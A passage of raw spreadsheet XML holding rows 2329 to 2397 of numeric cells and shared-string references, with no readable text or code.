      <c r="E2329" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F2329" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="2330" ht="15.75" customHeight="1">
      <c r="A2330" s="1">
        <v>18395.0</v>
      </c>
      <c r="B2330" s="2">
        <v>5.2615826E7</v>
      </c>
      <c r="C2330" s="2" t="s">
        <v>2153</v>
      </c>
      <c r="D2330" s="2">
        <v>1.0</v>
      </c>
      <c r="E2330" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F2330" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="2331" ht="15.75" customHeight="1">
      <c r="A2331" s="1">
        <v>18405.0</v>
      </c>
      <c r="B2331" s="2">
        <v>5.2637371E7</v>
      </c>
      <c r="C2331" s="2" t="s">
        <v>2154</v>
      </c>
      <c r="D2331" s="2">
        <v>1.0</v>
      </c>
      <c r="E2331" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F2331" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="2332" ht="15.75" customHeight="1">
      <c r="A2332" s="1">
        <v>18529.0</v>
      </c>
      <c r="B2332" s="2">
        <v>5.3076323E7</v>
      </c>
      <c r="C2332" s="2" t="s">
        <v>2155</v>
      </c>
      <c r="D2332" s="2">
        <v>1.0</v>
      </c>
      <c r="E2332" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F2332" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="2333" ht="15.75" customHeight="1">
      <c r="A2333" s="1">
        <v>18782.0</v>
      </c>
      <c r="B2333" s="2">
        <v>5.3823077E7</v>
      </c>
      <c r="C2333" s="2" t="s">
        <v>2156</v>
      </c>
      <c r="D2333" s="2">
        <v>1.0</v>
      </c>
      <c r="E2333" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F2333" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="2334" ht="15.75" customHeight="1">
      <c r="A2334" s="1">
        <v>18933.0</v>
      </c>
      <c r="B2334" s="2">
        <v>5.4261811E7</v>
      </c>
      <c r="C2334" s="2" t="s">
        <v>2157</v>
      </c>
      <c r="D2334" s="2">
        <v>1.0</v>
      </c>
      <c r="E2334" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F2334" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="2335" ht="15.75" customHeight="1">
      <c r="A2335" s="1">
        <v>19744.0</v>
      </c>
      <c r="B2335" s="2">
        <v>5.6691282E7</v>
      </c>
      <c r="C2335" s="2" t="s">
        <v>2158</v>
      </c>
      <c r="D2335" s="2">
        <v>1.0</v>
      </c>
      <c r="E2335" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F2335" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="2336" ht="15.75" customHeight="1">
      <c r="A2336" s="1">
        <v>20245.0</v>
      </c>
      <c r="B2336" s="2">
        <v>1.0938091E7</v>
      </c>
      <c r="C2336" s="2" t="s">
        <v>2159</v>
      </c>
      <c r="D2336" s="2">
        <v>1.0</v>
      </c>
      <c r="E2336" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F2336" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="2337" ht="15.75" customHeight="1">
      <c r="A2337" s="1">
        <v>20793.0</v>
      </c>
      <c r="B2337" s="2">
        <v>1.5235035E7</v>
      </c>
      <c r="C2337" s="2" t="s">
        <v>2160</v>
      </c>
      <c r="D2337" s="2">
        <v>1.0</v>
      </c>
      <c r="E2337" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F2337" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="2338" ht="15.75" customHeight="1">
      <c r="A2338" s="1">
        <v>20957.0</v>
      </c>
      <c r="B2338" s="2">
        <v>1.666513E7</v>
      </c>
      <c r="C2338" s="2" t="s">
        <v>2161</v>
      </c>
      <c r="D2338" s="2">
        <v>1.0</v>
      </c>
      <c r="E2338" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F2338" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="2339" ht="15.75" customHeight="1">
      <c r="A2339" s="1">
        <v>21077.0</v>
      </c>
      <c r="B2339" s="2">
        <v>1.7986061E7</v>
      </c>
      <c r="C2339" s="2" t="s">
        <v>2162</v>
      </c>
      <c r="D2339" s="2">
        <v>1.0</v>
      </c>
      <c r="E2339" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F2339" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="2340" ht="15.75" customHeight="1">
      <c r="A2340" s="1">
        <v>21085.0</v>
      </c>
      <c r="B2340" s="2">
        <v>1.8043958E7</v>
      </c>
      <c r="C2340" s="2" t="s">
        <v>2163</v>
      </c>
      <c r="D2340" s="2">
        <v>1.0</v>
      </c>
      <c r="E2340" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F2340" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="2341" ht="15.75" customHeight="1">
      <c r="A2341" s="1">
        <v>21298.0</v>
      </c>
      <c r="B2341" s="2">
        <v>2.0615422E7</v>
      </c>
      <c r="C2341" s="2" t="s">
        <v>2164</v>
      </c>
      <c r="D2341" s="2">
        <v>1.0</v>
      </c>
      <c r="E2341" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F2341" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="2342" ht="15.75" customHeight="1">
      <c r="A2342" s="1">
        <v>21362.0</v>
      </c>
      <c r="B2342" s="2">
        <v>2.1451673E7</v>
      </c>
      <c r="C2342" s="2" t="s">
        <v>2165</v>
      </c>
      <c r="D2342" s="2">
        <v>1.0</v>
      </c>
      <c r="E2342" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F2342" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="2343" ht="15.75" customHeight="1">
      <c r="A2343" s="1">
        <v>21774.0</v>
      </c>
      <c r="B2343" s="2">
        <v>2.640865E7</v>
      </c>
      <c r="C2343" s="2" t="s">
        <v>2166</v>
      </c>
      <c r="D2343" s="2">
        <v>1.0</v>
      </c>
      <c r="E2343" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F2343" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="2344" ht="15.75" customHeight="1">
      <c r="A2344" s="1">
        <v>22075.0</v>
      </c>
      <c r="B2344" s="2">
        <v>3.0616923E7</v>
      </c>
      <c r="C2344" s="2" t="s">
        <v>2167</v>
      </c>
      <c r="D2344" s="2">
        <v>1.0</v>
      </c>
      <c r="E2344" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F2344" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="2345" ht="15.75" customHeight="1">
      <c r="A2345" s="1">
        <v>22657.0</v>
      </c>
      <c r="B2345" s="2">
        <v>4.116275E7</v>
      </c>
      <c r="C2345" s="2" t="s">
        <v>2168</v>
      </c>
      <c r="D2345" s="2">
        <v>1.0</v>
      </c>
      <c r="E2345" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F2345" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="2346" ht="15.75" customHeight="1">
      <c r="A2346" s="1">
        <v>22848.0</v>
      </c>
      <c r="B2346" s="2">
        <v>4.6791454E7</v>
      </c>
      <c r="C2346" s="2" t="s">
        <v>2169</v>
      </c>
      <c r="D2346" s="2">
        <v>1.0</v>
      </c>
      <c r="E2346" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F2346" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="2347" ht="15.75" customHeight="1">
      <c r="A2347" s="1">
        <v>22884.0</v>
      </c>
      <c r="B2347" s="2">
        <v>4.7772183E7</v>
      </c>
      <c r="C2347" s="2" t="s">
        <v>2170</v>
      </c>
      <c r="D2347" s="2">
        <v>1.0</v>
      </c>
      <c r="E2347" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F2347" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="2348" ht="15.75" customHeight="1">
      <c r="A2348" s="1">
        <v>22987.0</v>
      </c>
      <c r="B2348" s="2">
        <v>4.9418531E7</v>
      </c>
      <c r="C2348" s="2" t="s">
        <v>2171</v>
      </c>
      <c r="D2348" s="2">
        <v>1.0</v>
      </c>
      <c r="E2348" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F2348" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="2349" ht="15.75" customHeight="1">
      <c r="A2349" s="1">
        <v>22997.0</v>
      </c>
      <c r="B2349" s="2">
        <v>4.9617021E7</v>
      </c>
      <c r="C2349" s="2" t="s">
        <v>2172</v>
      </c>
      <c r="D2349" s="2">
        <v>1.0</v>
      </c>
      <c r="E2349" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F2349" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="2350" ht="15.75" customHeight="1">
      <c r="A2350" s="1">
        <v>23026.0</v>
      </c>
      <c r="B2350" s="2">
        <v>4998404.0</v>
      </c>
      <c r="C2350" s="2" t="s">
        <v>2173</v>
      </c>
      <c r="D2350" s="2">
        <v>1.0</v>
      </c>
      <c r="E2350" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F2350" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="2351" ht="15.75" customHeight="1">
      <c r="A2351" s="1">
        <v>23065.0</v>
      </c>
      <c r="B2351" s="2">
        <v>5.041857E7</v>
      </c>
      <c r="C2351" s="2" t="s">
        <v>2174</v>
      </c>
      <c r="D2351" s="2">
        <v>1.0</v>
      </c>
      <c r="E2351" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F2351" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="2352" ht="15.75" customHeight="1">
      <c r="A2352" s="1">
        <v>23192.0</v>
      </c>
      <c r="B2352" s="2">
        <v>5.2387324E7</v>
      </c>
      <c r="C2352" s="2" t="s">
        <v>2175</v>
      </c>
      <c r="D2352" s="2">
        <v>1.0</v>
      </c>
      <c r="E2352" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F2352" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="2353" ht="15.75" customHeight="1">
      <c r="A2353" s="1">
        <v>23810.0</v>
      </c>
      <c r="B2353" s="2">
        <v>7895342.0</v>
      </c>
      <c r="C2353" s="2" t="s">
        <v>2176</v>
      </c>
      <c r="D2353" s="2">
        <v>1.0</v>
      </c>
      <c r="E2353" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F2353" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="2354" ht="15.75" customHeight="1">
      <c r="A2354" s="1">
        <v>24457.0</v>
      </c>
      <c r="B2354" s="2">
        <v>1.093809E7</v>
      </c>
      <c r="C2354" s="2" t="s">
        <v>2159</v>
      </c>
      <c r="D2354" s="2">
        <v>1.0</v>
      </c>
      <c r="E2354" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F2354" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="2355" ht="15.75" customHeight="1">
      <c r="A2355" s="1">
        <v>24986.0</v>
      </c>
      <c r="B2355" s="2">
        <v>1.2685998E7</v>
      </c>
      <c r="C2355" s="2" t="s">
        <v>2177</v>
      </c>
      <c r="D2355" s="2">
        <v>1.0</v>
      </c>
      <c r="E2355" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F2355" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="2356" ht="15.75" customHeight="1">
      <c r="A2356" s="1">
        <v>25235.0</v>
      </c>
      <c r="B2356" s="2">
        <v>1.3373555E7</v>
      </c>
      <c r="C2356" s="2" t="s">
        <v>2178</v>
      </c>
      <c r="D2356" s="2">
        <v>1.0</v>
      </c>
      <c r="E2356" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F2356" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="2357" ht="15.75" customHeight="1">
      <c r="A2357" s="1">
        <v>25509.0</v>
      </c>
      <c r="B2357" s="2">
        <v>1.4156629E7</v>
      </c>
      <c r="C2357" s="2" t="s">
        <v>2179</v>
      </c>
      <c r="D2357" s="2">
        <v>1.0</v>
      </c>
      <c r="E2357" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F2357" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="2358" ht="15.75" customHeight="1">
      <c r="A2358" s="1">
        <v>25766.0</v>
      </c>
      <c r="B2358" s="2">
        <v>1.4652074E7</v>
      </c>
      <c r="C2358" s="2" t="s">
        <v>2180</v>
      </c>
      <c r="D2358" s="2">
        <v>1.0</v>
      </c>
      <c r="E2358" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F2358" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="2359" ht="15.75" customHeight="1">
      <c r="A2359" s="1">
        <v>25822.0</v>
      </c>
      <c r="B2359" s="2">
        <v>1.4769933E7</v>
      </c>
      <c r="C2359" s="2" t="s">
        <v>2181</v>
      </c>
      <c r="D2359" s="2">
        <v>1.0</v>
      </c>
      <c r="E2359" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F2359" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="2360" ht="15.75" customHeight="1">
      <c r="A2360" s="1">
        <v>25953.0</v>
      </c>
      <c r="B2360" s="2">
        <v>1.5254743E7</v>
      </c>
      <c r="C2360" s="2" t="s">
        <v>2182</v>
      </c>
      <c r="D2360" s="2">
        <v>1.0</v>
      </c>
      <c r="E2360" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F2360" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="2361" ht="15.75" customHeight="1">
      <c r="A2361" s="1">
        <v>26628.0</v>
      </c>
      <c r="B2361" s="2">
        <v>1.8043957E7</v>
      </c>
      <c r="C2361" s="2" t="s">
        <v>2163</v>
      </c>
      <c r="D2361" s="2">
        <v>1.0</v>
      </c>
      <c r="E2361" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F2361" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="2362" ht="15.75" customHeight="1">
      <c r="A2362" s="1">
        <v>26921.0</v>
      </c>
      <c r="B2362" s="2">
        <v>1.9400587E7</v>
      </c>
      <c r="C2362" s="2" t="s">
        <v>2183</v>
      </c>
      <c r="D2362" s="2">
        <v>1.0</v>
      </c>
      <c r="E2362" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F2362" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="2363" ht="15.75" customHeight="1">
      <c r="A2363" s="1">
        <v>26982.0</v>
      </c>
      <c r="B2363" s="2">
        <v>1.9756104E7</v>
      </c>
      <c r="C2363" s="2" t="s">
        <v>2184</v>
      </c>
      <c r="D2363" s="2">
        <v>1.0</v>
      </c>
      <c r="E2363" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F2363" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="2364" ht="15.75" customHeight="1">
      <c r="A2364" s="1">
        <v>27079.0</v>
      </c>
      <c r="B2364" s="2">
        <v>2.0471637E7</v>
      </c>
      <c r="C2364" s="2" t="s">
        <v>2185</v>
      </c>
      <c r="D2364" s="2">
        <v>1.0</v>
      </c>
      <c r="E2364" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F2364" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="2365" ht="15.75" customHeight="1">
      <c r="A2365" s="1">
        <v>27109.0</v>
      </c>
      <c r="B2365" s="2">
        <v>2.0615421E7</v>
      </c>
      <c r="C2365" s="2" t="s">
        <v>2164</v>
      </c>
      <c r="D2365" s="2">
        <v>1.0</v>
      </c>
      <c r="E2365" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F2365" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="2366" ht="15.75" customHeight="1">
      <c r="A2366" s="1">
        <v>27210.0</v>
      </c>
      <c r="B2366" s="2">
        <v>2.0966486E7</v>
      </c>
      <c r="C2366" s="2" t="s">
        <v>2186</v>
      </c>
      <c r="D2366" s="2">
        <v>1.0</v>
      </c>
      <c r="E2366" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F2366" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="2367" ht="15.75" customHeight="1">
      <c r="A2367" s="1">
        <v>27507.0</v>
      </c>
      <c r="B2367" s="2">
        <v>2.2116599E7</v>
      </c>
      <c r="C2367" s="2" t="s">
        <v>2187</v>
      </c>
      <c r="D2367" s="2">
        <v>1.0</v>
      </c>
      <c r="E2367" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F2367" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="2368" ht="15.75" customHeight="1">
      <c r="A2368" s="1">
        <v>28027.0</v>
      </c>
      <c r="B2368" s="2">
        <v>2.4436339E7</v>
      </c>
      <c r="C2368" s="2" t="s">
        <v>2188</v>
      </c>
      <c r="D2368" s="2">
        <v>1.0</v>
      </c>
      <c r="E2368" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F2368" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="2369" ht="15.75" customHeight="1">
      <c r="A2369" s="1">
        <v>28112.0</v>
      </c>
      <c r="B2369" s="2">
        <v>2.4657323E7</v>
      </c>
      <c r="C2369" s="2" t="s">
        <v>2189</v>
      </c>
      <c r="D2369" s="2">
        <v>1.0</v>
      </c>
      <c r="E2369" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F2369" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="2370" ht="15.75" customHeight="1">
      <c r="A2370" s="1">
        <v>28663.0</v>
      </c>
      <c r="B2370" s="2">
        <v>2.7417179E7</v>
      </c>
      <c r="C2370" s="2" t="s">
        <v>2190</v>
      </c>
      <c r="D2370" s="2">
        <v>1.0</v>
      </c>
      <c r="E2370" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F2370" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="2371" ht="15.75" customHeight="1">
      <c r="A2371" s="1">
        <v>29563.0</v>
      </c>
      <c r="B2371" s="2">
        <v>3.3217498E7</v>
      </c>
      <c r="C2371" s="2" t="s">
        <v>2191</v>
      </c>
      <c r="D2371" s="2">
        <v>1.0</v>
      </c>
      <c r="E2371" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F2371" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="2372" ht="15.75" customHeight="1">
      <c r="A2372" s="1">
        <v>29703.0</v>
      </c>
      <c r="B2372" s="2">
        <v>3.4377877E7</v>
      </c>
      <c r="C2372" s="2" t="s">
        <v>2192</v>
      </c>
      <c r="D2372" s="2">
        <v>1.0</v>
      </c>
      <c r="E2372" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F2372" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="2373" ht="15.75" customHeight="1">
      <c r="A2373" s="1">
        <v>29803.0</v>
      </c>
      <c r="B2373" s="2">
        <v>3.5132622E7</v>
      </c>
      <c r="C2373" s="2" t="s">
        <v>2193</v>
      </c>
      <c r="D2373" s="2">
        <v>1.0</v>
      </c>
      <c r="E2373" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F2373" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="2374" ht="15.75" customHeight="1">
      <c r="A2374" s="1">
        <v>29911.0</v>
      </c>
      <c r="B2374" s="2">
        <v>3607050.0</v>
      </c>
      <c r="C2374" s="2" t="s">
        <v>2194</v>
      </c>
      <c r="D2374" s="2">
        <v>1.0</v>
      </c>
      <c r="E2374" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F2374" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="2375" ht="15.75" customHeight="1">
      <c r="A2375" s="1">
        <v>30569.0</v>
      </c>
      <c r="B2375" s="2">
        <v>4.0969541E7</v>
      </c>
      <c r="C2375" s="2" t="s">
        <v>2195</v>
      </c>
      <c r="D2375" s="2">
        <v>1.0</v>
      </c>
      <c r="E2375" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F2375" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="2376" ht="15.75" customHeight="1">
      <c r="A2376" s="1">
        <v>31159.0</v>
      </c>
      <c r="B2376" s="2">
        <v>4902066.0</v>
      </c>
      <c r="C2376" s="2" t="s">
        <v>2196</v>
      </c>
      <c r="D2376" s="2">
        <v>1.0</v>
      </c>
      <c r="E2376" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F2376" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="2377" ht="15.75" customHeight="1">
      <c r="A2377" s="1">
        <v>31233.0</v>
      </c>
      <c r="B2377" s="2">
        <v>4.9276468E7</v>
      </c>
      <c r="C2377" s="2" t="s">
        <v>2197</v>
      </c>
      <c r="D2377" s="2">
        <v>1.0</v>
      </c>
      <c r="E2377" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F2377" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="2378" ht="15.75" customHeight="1">
      <c r="A2378" s="1">
        <v>31252.0</v>
      </c>
      <c r="B2378" s="2">
        <v>4.941853E7</v>
      </c>
      <c r="C2378" s="2" t="s">
        <v>2171</v>
      </c>
      <c r="D2378" s="2">
        <v>1.0</v>
      </c>
      <c r="E2378" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F2378" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="2379" ht="15.75" customHeight="1">
      <c r="A2379" s="1">
        <v>31262.0</v>
      </c>
      <c r="B2379" s="2">
        <v>4942565.0</v>
      </c>
      <c r="C2379" s="2" t="s">
        <v>2198</v>
      </c>
      <c r="D2379" s="2">
        <v>1.0</v>
      </c>
      <c r="E2379" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F2379" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="2380" ht="15.75" customHeight="1">
      <c r="A2380" s="1">
        <v>31268.0</v>
      </c>
      <c r="B2380" s="2">
        <v>4942565.0</v>
      </c>
      <c r="C2380" s="2" t="s">
        <v>2199</v>
      </c>
      <c r="D2380" s="2">
        <v>1.0</v>
      </c>
      <c r="E2380" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F2380" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="2381" ht="15.75" customHeight="1">
      <c r="A2381" s="1">
        <v>31284.0</v>
      </c>
      <c r="B2381" s="2">
        <v>4.961702E7</v>
      </c>
      <c r="C2381" s="2" t="s">
        <v>2200</v>
      </c>
      <c r="D2381" s="2">
        <v>1.0</v>
      </c>
      <c r="E2381" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F2381" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="2382" ht="15.75" customHeight="1">
      <c r="A2382" s="1">
        <v>31442.0</v>
      </c>
      <c r="B2382" s="2">
        <v>5.0241179E7</v>
      </c>
      <c r="C2382" s="2" t="s">
        <v>2201</v>
      </c>
      <c r="D2382" s="2">
        <v>1.0</v>
      </c>
      <c r="E2382" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F2382" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="2383" ht="15.75" customHeight="1">
      <c r="A2383" s="1">
        <v>31460.0</v>
      </c>
      <c r="B2383" s="2">
        <v>5.0418569E7</v>
      </c>
      <c r="C2383" s="2" t="s">
        <v>2174</v>
      </c>
      <c r="D2383" s="2">
        <v>1.0</v>
      </c>
      <c r="E2383" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F2383" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="2384" ht="15.75" customHeight="1">
      <c r="A2384" s="1">
        <v>32236.0</v>
      </c>
      <c r="B2384" s="2">
        <v>5503812.0</v>
      </c>
      <c r="C2384" s="2" t="s">
        <v>2202</v>
      </c>
      <c r="D2384" s="2">
        <v>1.0</v>
      </c>
      <c r="E2384" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F2384" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="2385" ht="15.75" customHeight="1">
      <c r="A2385" s="1">
        <v>32241.0</v>
      </c>
      <c r="B2385" s="2">
        <v>5503812.0</v>
      </c>
      <c r="C2385" s="2" t="s">
        <v>2203</v>
      </c>
      <c r="D2385" s="2">
        <v>1.0</v>
      </c>
      <c r="E2385" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F2385" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="2386" ht="15.75" customHeight="1">
      <c r="A2386" s="1">
        <v>32379.0</v>
      </c>
      <c r="B2386" s="2">
        <v>5.6096182E7</v>
      </c>
      <c r="C2386" s="2" t="s">
        <v>2204</v>
      </c>
      <c r="D2386" s="2">
        <v>1.0</v>
      </c>
      <c r="E2386" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F2386" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="2387" ht="15.75" customHeight="1">
      <c r="A2387" s="1">
        <v>32820.0</v>
      </c>
      <c r="B2387" s="2">
        <v>6216210.0</v>
      </c>
      <c r="C2387" s="2" t="s">
        <v>2205</v>
      </c>
      <c r="D2387" s="2">
        <v>1.0</v>
      </c>
      <c r="E2387" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F2387" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="2388" ht="15.75" customHeight="1">
      <c r="A2388" s="1">
        <v>32878.0</v>
      </c>
      <c r="B2388" s="2">
        <v>6336975.0</v>
      </c>
      <c r="C2388" s="2" t="s">
        <v>2206</v>
      </c>
      <c r="D2388" s="2">
        <v>1.0</v>
      </c>
      <c r="E2388" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F2388" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="2389" ht="15.75" customHeight="1">
      <c r="A2389" s="1">
        <v>33087.0</v>
      </c>
      <c r="B2389" s="2">
        <v>6936556.0</v>
      </c>
      <c r="C2389" s="2" t="s">
        <v>2207</v>
      </c>
      <c r="D2389" s="2">
        <v>1.0</v>
      </c>
      <c r="E2389" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F2389" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="2390" ht="15.75" customHeight="1">
      <c r="A2390" s="1">
        <v>33091.0</v>
      </c>
      <c r="B2390" s="2">
        <v>6936556.0</v>
      </c>
      <c r="C2390" s="2" t="s">
        <v>2208</v>
      </c>
      <c r="D2390" s="2">
        <v>1.0</v>
      </c>
      <c r="E2390" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F2390" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="2391" ht="15.75" customHeight="1">
      <c r="A2391" s="1">
        <v>33532.0</v>
      </c>
      <c r="B2391" s="2">
        <v>8137495.0</v>
      </c>
      <c r="C2391" s="2" t="s">
        <v>2209</v>
      </c>
      <c r="D2391" s="2">
        <v>1.0</v>
      </c>
      <c r="E2391" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F2391" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="2392" ht="15.75" customHeight="1">
      <c r="A2392" s="1">
        <v>136.0</v>
      </c>
      <c r="B2392" s="2">
        <v>1.3373342E7</v>
      </c>
      <c r="C2392" s="2" t="s">
        <v>2210</v>
      </c>
      <c r="D2392" s="2">
        <v>1.0</v>
      </c>
      <c r="E2392" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F2392" s="2">
        <v>0.09912854030501089</v>
      </c>
    </row>
    <row r="2393" ht="15.75" customHeight="1">
      <c r="A2393" s="1">
        <v>13485.0</v>
      </c>
      <c r="B2393" s="2">
        <v>3.5348622E7</v>
      </c>
      <c r="C2393" s="2" t="s">
        <v>2211</v>
      </c>
      <c r="D2393" s="2">
        <v>1.0</v>
      </c>
      <c r="E2393" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F2393" s="2">
        <v>0.09912854030501089</v>
      </c>
    </row>
    <row r="2394" ht="15.75" customHeight="1">
      <c r="A2394" s="1">
        <v>21468.0</v>
      </c>
      <c r="B2394" s="2">
        <v>2.2810408E7</v>
      </c>
      <c r="C2394" s="2" t="s">
        <v>2212</v>
      </c>
      <c r="D2394" s="2">
        <v>1.0</v>
      </c>
      <c r="E2394" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F2394" s="2">
        <v>0.09912854030501089</v>
      </c>
    </row>
    <row r="2395" ht="15.75" customHeight="1">
      <c r="A2395" s="1">
        <v>22448.0</v>
      </c>
      <c r="B2395" s="2">
        <v>3625152.0</v>
      </c>
      <c r="C2395" s="2" t="s">
        <v>2213</v>
      </c>
      <c r="D2395" s="2">
        <v>1.0</v>
      </c>
      <c r="E2395" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F2395" s="2">
        <v>0.09912854030501089</v>
      </c>
    </row>
    <row r="2396" ht="15.75" customHeight="1">
      <c r="A2396" s="1">
        <v>22963.0</v>
      </c>
      <c r="B2396" s="2">
        <v>4918685.0</v>
      </c>
      <c r="C2396" s="2" t="s">
        <v>2088</v>
      </c>
      <c r="D2396" s="2">
        <v>1.0</v>
      </c>
      <c r="E2396" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F2396" s="2">
        <v>0.09912854030501089</v>
      </c>
    </row>
    <row r="2397" ht="15.75" customHeight="1">
